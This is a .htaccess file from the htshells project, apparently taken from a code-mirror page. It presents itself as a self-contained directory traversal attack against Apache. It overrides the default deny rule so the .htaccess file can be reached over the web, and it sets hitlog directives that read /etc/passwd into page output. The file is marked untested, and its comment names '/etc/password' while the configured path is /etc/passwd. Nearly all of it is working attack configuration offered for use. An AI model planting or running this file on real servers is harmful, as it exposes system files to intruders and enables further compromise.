0xBADCA7/htshells/master/traversal/mod_hitlog.traversal.htaccess - Htaccess File


# Untested
# Self contained .htaccess directory traversal attack - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# This attack will dump /etc/password
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all

# Enable hitlog
HitlogEnabled On

# Specify file to read
HitlogCodePath /etc/passwd

# Specify a tag to append the code to
HitlogHtmlTal <traversal>

# And finally trigger the attack (although the above should already have done so): <traversal>

On Github License


Download PDF of Htaccess file